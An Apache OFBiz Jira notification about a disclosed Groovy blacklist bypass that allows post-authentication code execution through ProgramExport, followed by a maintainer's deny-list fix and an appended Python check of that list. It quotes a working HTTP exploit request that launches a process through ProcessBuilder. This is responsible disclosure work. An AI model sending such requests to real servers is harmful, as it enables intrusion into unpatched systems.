[ https://issues.apache.org/jira/browse/OFBIZ-12571?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17490217#comment-17490217 ]

Jacques Le Roux edited comment on OFBIZ-12571 at 2/10/22, 1:26 PM:
-------------------------------------------------------------------

Thanks Y4er for your much appreciated report.

This has been fixed simply by adding processbuilder to deniedWebShellTokens in the security.properties file.

If you find some other similar issues, don't hesitate to create a new Jira, TIA


was (Author: jacques.le.roux):
This has been fixed simply by adding processbuilder to deniedWebShellTokens in 
security.properties file

> groovy blacklist bypass cause post-auth RCE from 
> webtools/control/ProgramExport
> -------------------------------------------------------------------------------
>
>                 Key: OFBIZ-12571
>                 URL: https://issues.apache.org/jira/browse/OFBIZ-12571
>             Project: OFBiz
>          Issue Type: Bug
>          Components: framework/webtools
>    Affects Versions: 18.12.05
>         Environment: ofbiz 18.12.05
>            Reporter: Y4er
>            Assignee: Jacques Le Roux
>            Priority: Major
>             Fix For: 18.12.06, 22.01.01
>
>         Attachments: image-2022-02-10-17-50-58-914.png
>
>
> groovy blacklist bypass cause post-auth RCE from 
> webtools/control/ProgramExport
>  
> {code:java}
> POST /webtools/control/ProgramExport HTTP/1.1
> Host: 192.168.1.178:8443
> Cookie: JSESSIONID=256ECC64937BFB5F47A32A14B272EE8F.jvm1; webtools.securedLoginId=admin; OFBiz.Visitor=10302
> Content-Type: application/x-www-form-urlencoded
> Connection: close
> Content-Length: 68
>
> groovyProgram=ProcessBuilder.newInstance%28%22calc%22%29.start%28%29
> {code}
> !image-2022-02-10-17-50-58-914.png|width=751,height=407!



--
This message was sent by Atlassian Jira
(v8.20.1#820001)
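
An added illustration of the fix described in this thread, not OFBiz code: it checks the reported request body against a deniedWebShellTokens list before and after `processbuilder` is added. The other tokens are constructed placeholders, the helper names are hypothetical, and the check is assumed to be a case-insensitive substring match on the URL-decoded `groovyProgram` value.

```python
from urllib.parse import parse_qs

# Constructed stand-ins for the two states of security.properties. The real
# token list is not shown in the thread, only the added "processbuilder" entry.
PROPS_BEFORE = "deniedWebShellTokens=exec(,runtime.getruntime,<%"
PROPS_AFTER = PROPS_BEFORE + ",processbuilder"

# Request body taken from the quoted report.
REPORTED_BODY = "groovyProgram=ProcessBuilder.newInstance%28%22calc%22%29.start%28%29"


def load_denied_tokens(properties_text):
    """Read the comma-separated deniedWebShellTokens value, lowercased."""
    for line in properties_text.splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip() == "deniedWebShellTokens":
            return [t.strip().lower() for t in value.split(",") if t.strip()]
    return []


def denied_tokens_in(body, tokens, field="groovyProgram"):
    """Return the denied tokens present in the decoded form field."""
    # parse_qs URL-decodes the value, so %28 is compared as "(".
    values = parse_qs(body, keep_blank_values=True).get(field, [])
    # Lowercase the submitted program so "ProcessBuilder" matches the
    # lowercase token "processbuilder" (assumed matching behaviour).
    text = "\n".join(values).lower()
    return [t for t in tokens if t in text]


if __name__ == "__main__":
    for label, props in (("before fix", PROPS_BEFORE), ("after fix", PROPS_AFTER)):
        hits = denied_tokens_in(REPORTED_BODY, load_denied_tokens(props))
        print(f"{label}: {'rejected ' + str(hits) if hits else 'accepted'}")
```

A list-based check only rejects the names it contains, so an allowlist of permitted operations on this endpoint is the more robust control where it is feasible.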